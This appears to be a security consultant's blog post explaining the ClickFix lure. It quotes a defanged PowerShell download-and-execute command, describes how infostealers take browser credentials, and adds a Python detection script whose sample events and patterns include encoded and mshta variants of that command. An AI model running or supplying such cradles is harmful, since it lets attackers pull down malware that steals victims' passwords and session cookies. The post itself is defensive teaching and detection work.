You have almost certainly seen it already. A page that says "verify you are human", or "your browser ran into an error, follow these steps to fix it". The instructions look harmless: press Win+R, paste, press Enter. Just another procedure. It is called ClickFix, and right now it is one of the most widespread attack techniques in the world. Its genius - and the reason it is so dangerous - is that it does not exploit a vulnerability in your computer. It exploits you.
How the chain works
The scenario is almost always the same. You land on a page - a fake CAPTCHA, a fake Chrome error, a fake document "to unlock" - that gives you step-by-step instructions to follow in order to continue. While you read them, a piece of JavaScript on the page has already silently copied a command into your clipboard. You open the Windows Run dialog with Win+R, paste with Ctrl+V - and what lands there is the attacker's command, not what you think - and you press Enter. That command, usually an obfuscated mshta or powershell, downloads and runs malware. You did not open an attachment, you did not click a suspicious link. You simply followed a procedure.


What that command actually does
It is worth opening up, because every piece has a precise job. What gets pasted, in simplified form, looks like this:
powershell -W Hidden -nop -ep bypass -c "IEX(IWR -useb hxxps://cdn-verify[.]top/x)"
Translated piece by piece:
- powershell - the Windows scripting engine. It is installed everywhere and signed by Microsoft: to the system it is a trusted program, not a virus.
- -W Hidden - launches the window hidden. You see nothing open: no flash, no console.
- -nop - skips the PowerShell profile, so nothing the user or IT put in that profile (custom prompts, logging hooks) gets in the way.
- -ep bypass - ignores the execution policy that is supposed to block untrusted scripts from running. Execution policy is a safety setting, not a security boundary: a single switch turns it off.
- IWR (Invoke-WebRequest) - downloads a file from a web address: here, the real malware. The -useb (-UseBasicParsing) that follows it just keeps the download from depending on Internet Explorer components, so it works on any Windows box.
- IEX (Invoke-Expression) - runs the just-downloaded text as code, directly in memory, without ever saving it to disk.
One detail worth knowing: PowerShell accepts any unambiguous prefix of a switch, so -w hidden, -win hidden and -WindowStyle Hidden all mean the same thing, and -e, -ec, -enc and -EncodedCommand all hand it a base64-encoded script. Campaigns rotate between these spellings, which is why matching on one exact string misses the next variant.
That last point is the heart of it: the attack is fileless at this stage. Nothing is written to the hard disk before the script runs, so traditional antivirus - which works by scanning files - has nothing to scan. The malware lives in RAM, run by a legitimate Windows process the victim launched themselves. Fileless does not mean invisible, though: PowerShell's script block logging (Event ID 4104) and AMSI both see the decoded text that IEX executes, and the stealer it pulls down often drops files of its own once it is running.
Step by step, behind the scenes
Here is what actually happens from click to exfiltration, even though you see almost nothing on screen:
- Clipboard hijack. The moment you click "Verify" or "Fix", a piece of JavaScript on the page silently copies the command into your clipboard. What you are about to paste is not what you think: it is already the attacker's command.
- Execution. Win+R opens the Run dialog, you paste, you press Enter. Windows launches PowerShell with those parameters. To a defense that looks only at the process name, this is "PowerShell starting" - a perfectly normal event. What gives it away is the context: explorer.exe spawning an interpreter with a hidden window, a bypassed execution policy and a download in the command line.
- Download into memory. IWR contacts the attacker's server and downloads the real payload - the stealer - straight into RAM.
- Fileless execution. IEX runs it on the fly. No file on disk, nothing for classic antivirus to trip on.
- Harvesting. The stealer opens the browser's databases (saved passwords in Login Data, cookies in Cookies: these are SQLite files), decrypts them using Windows DPAPI - which runs with your own permissions, so no elevation is needed - and also grabs crypto wallets, tokens and interesting files.
- Exfiltration. It packages everything and sends it to the command-and-control (C2) server over HTTPS, blending into normal encrypted web traffic.
- Vanishing. Many stealers are "smash and grab": they steal and leave within minutes, installing nothing permanent, so forensic analysis finds very few traces.
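The process-creation context described in the Execution step is exactly what a SOC can key on. What follows is an added example, my own code rather than anything from the article or from a vendor: a small triage routine over Windows process-creation events (the ParentImage, Image and CommandLine fields that Sysmon Event ID 1 and Security Event 4688 record) that scores each event for the ClickFix pattern, using the switch prefixes and the download-cradle-plus-IEX combination decoded above, and unpacks an -EncodedCommand payload before scoring so base64 does not hide the cradle. The five events are constructed for the example (the first reuses the article's defanged command); the indicator weights and the 3/6 thresholds are illustrative assumptions, not a vendor's rules.

```python
"""Added example, not code from the article: triage of Windows process-creation
telemetry for the ClickFix pattern (interpreter launched from the Run dialog,
hidden window, bypassed policy, download cradle fed into IEX).  Sample events
are constructed; weights and thresholds are assumptions for illustration."""
import base64
import binascii
import re

# Interpreters a ClickFix lure has the victim launch.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}
# Win+R hands the typed command to explorer.exe, so that is the parent to expect.
RUN_DIALOG_PARENTS = {"explorer.exe"}

# PowerShell accepts any unambiguous prefix of a switch (-w, -win, -WindowStyle),
# so these match prefixes rather than full names.  Value is (weight, pattern).
INDICATORS = {
    "hidden_window":   (2, re.compile(r"-w[a-z]*\s+h(?:idden)?\b", re.I)),
    "no_profile":      (1, re.compile(r"-nop[a-z]*\b", re.I)),
    "bypass_policy":   (1, re.compile(r"-e[a-z]*\s+(?:bypass|unrestricted)\b", re.I)),
    "download_cradle": (3, re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|"
                                      r"downloadstring|downloadfile|start-bitstransfer|"
                                      r"curl|wget)\b", re.I)),
    "in_memory_exec":  (3, re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    # mshta pulling an .hta or inline script from a URL; hxxp covers defanged samples.
    "mshta_remote":    (5, re.compile(r"\bmshta(?:\.exe)?\b.*(?:https?://|hxxps?://|"
                                      r"javascript:|vbscript:)", re.I)),
}
# -e / -ec / -enc / -EncodedCommand followed by base64 of a UTF-16LE script.
ENCODED = re.compile(r"-e(?:c|nc[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand script, or '' if there is none."""
    m = ENCODED.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le", "replace")
    except binascii.Error:
        return ""


def score_event(event: dict) -> dict:
    """Score one process-creation event; returns indicators, score and verdict."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    cmdline = event["CommandLine"]
    decoded = decode_encoded_command(cmdline)
    # Scan raw line and decoded payload together so encoding hides nothing.
    text = cmdline + " " + decoded
    hits, score = [], 0
    if image in INTERPRETERS and parent in RUN_DIALOG_PARENTS:
        hits.append("interpreter_from_run_dialog")
        score += 1
    if decoded:
        hits.append("encoded_command")
        score += 2
    for name, (weight, pattern) in INDICATORS.items():
        if pattern.search(text):
            hits.append(name)
            score += weight
    verdict = "clickfix_likely" if score >= 6 else "review" if score >= 3 else "benign"
    return {"indicators": hits, "score": score, "verdict": verdict, "decoded": decoded}


def _encode(script: str) -> str:
    """Build an -EncodedCommand argument the way attackers do (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed for this example; URLs defanged as in the article
    # 1. the article's command, pasted into the Run dialog
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": 'powershell -W Hidden -nop -ep bypass -c "IEX(IWR -useb hxxps://cdn-verify[.]top/x)"'},
    # 2. the same payload hidden behind -enc
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell -nop -w hidden -enc "
                    + _encode("IEX(IWR -useb 'hxxps://cdn-verify[.]top/x')")},
    # 3. mshta variant fetching a remote .hta
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta hxxps://cdn-verify[.]top/verify.hta"},
    # 4. an admin's scheduled task: same switches, but no cradle and no IEX
    {"ParentImage": r"C:\Windows\System32\svchost.exe", "Image": PS,
     "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Scripts\backup.ps1"},
    # 5. a user simply opening a console from the Run dialog
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS, "CommandLine": "powershell.exe"},
]


def triage(events=SAMPLE_EVENTS) -> list:
    """Score a batch of events, preserving order."""
    return [score_event(e) for e in events]


if __name__ == "__main__":
    for e, r in zip(SAMPLE_EVENTS, triage()):
        print(f"{r['verdict']:16} score={r['score']:2}  {e['CommandLine'][:70]}")
```

Run as-is, the three lure variants come out clickfix_likely (the encoded one because the decoded text still contains IWR and IEX), the scheduled backup task lands in review (it shares -NoProfile, -ExecutionPolicy Bypass and -WindowStyle Hidden but has no download cradle and no in-memory execution), and the bare console stays benign. In practice you would feed it the same three columns straight from your EDR or SIEM export and tune the weights against the admin scripts that legitimately run in your estate.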
Why it works
Two reasons, one psychological and one technical. The psychological one is that it hijacks the routine of "follow the steps to fix the problem" - the very same thing you do ten times a day when IT tells you how to sort something out. The brain does not raise its guard, because it is a familiar procedure, not a suspicious attachment. The technical one is even nastier: the technique sidesteps most defenses precisely because you are the one launching the command. There is no vulnerability to exploit, no malicious file an antivirus can catch before it opens. Execution starts from a legitimate user action on a legitimate Windows tool. It is a cheap attack, infinitely scalable - just a web page - and it works.
What it actually installs
Almost always, an infostealer. It steals the passwords saved in your browser, crypto wallets, and - the part most people underestimate - your session cookies. And this is where "but I have two-factor authentication" falls apart. A stolen session cookie means the attacker is already inside your accounts: logged in as you, with no need for your password, fully bypassing MFA, because your session had already been authenticated. MFA protects the moment of login, not an already-active session stolen from under your nose.
Why it is exploding
ClickFix is not new: Proofpoint researchers documented the technique in 2024 and gave it its name, and it exploded through 2025. To give a sense of scale, industry telemetry put the growth between the second half of 2024 and the first half of 2025 at more than 500%, and Microsoft's own figures have it driving nearly half of the initial-access attempts the company tracks. In my work across phishing simulation and threat intelligence I see these campaigns from both sides, and the trajectory is clear. ClickFix has become one of the most-used initial-access vectors because it satisfies everything an attacker wants: it costs almost nothing (it is a page), it requires no exploit development, it slips past email filters because the victim often arrives via a malicious ad or a compromised site rather than an attachment, and it targets the one attack surface that never gets patched - people. As long as convincing a human stays easier than breaking into a patched system, techniques like this will dominate.
How to spot it
There is one rule, and it is enough: no legitimate site will ever ask you to open the Run dialog (Win+R), a terminal, or PowerShell and paste something into it. The same goes for "open Terminal and paste this" on a Mac or Linux machine: the technique is not tied to Windows. A real CAPTCHA does not need your keyboard shortcuts. A real browser error is not fixed by copying commands. If a page - however convincing, however urgent - tells you to "press these keys and paste", that is the end of the conversation: close it and walk away. It is not a procedure, it is an attack asking you to run it yourself.
How to defend, on the company side
For an SME the defense has two legs. The first is human: people need to be exposed to this specific pattern before they meet it for real, ideally through simulations that include the ClickFix pattern, not a generic phishing slide. Someone who has already seen the trap in a test recognizes it in the wild. The second is technical: attack-surface-reduction rules that stop mshta and script interpreters from launching out of anomalous contexts (Defender's "Block execution of potentially obfuscated scripts" and "Block JavaScript or VBScript from launching downloaded executable content" rules are the relevant ones), application control, an EDR that reasons about behavior and not just signatures - explorer.exe spawning powershell.exe or mshta.exe with a hidden window and a URL in the command line is a detection in its own right - PowerShell script block logging so that what IEX ran is on record even though nothing touched disk, and restrictions on who can actually launch PowerShell on a company machine (Constrained Language Mode for standard users, or the Group Policy that removes the Run dialog altogether for people who never need it). You need both legs: technical controls catch what human attention misses, and vice versa.
The lesson
The most reliable exploit of 2026 is not a six-figure zero-day: it is a convincing instruction given to the right person at the right moment. And the defense, against this class of attacks, is never only technology. It is teaching people the one rule that shields them from half of modern threats: never paste a command someone else gave you.
If you want to dive deeper into this topic or need specialized consulting, let us talk.